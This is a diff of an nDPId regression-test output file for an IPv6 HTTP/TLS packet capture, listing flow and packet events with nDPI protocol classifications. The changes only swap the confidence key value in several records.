00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1448269144475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144475,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhZ4xPkwgBAA4WsSAAABAQgKEg186gBesqQ="} -00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01391{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01391{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269145458,"flow_last_seen":1448269145458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269145458,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1448269145458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145458,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAS6SoBu3aemNPcvXclgBAA6hVxAAABAQgKEg194OPdWG4="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1448269145478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145478,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBIqAA1AAAEAA3qswP\/+pw1MAbvpKty9dyV2npjUgBAA8BoIAAABAQgK494IbhIM+eU="} @@ -68,23 +68,23 @@ 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfTp+pk3gBAA4dR2AAABAQgKEg1\/Sxvn+wE="} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjOjBmT8LSrsqoBJswEUcAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuyrowZlAgBAA4dR2AAABAQgKEg1\/Sxvn+wE="} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} -00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} -00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} +00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} +00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1448269127400,"flow_last_seen":1448269138520,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":12133,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 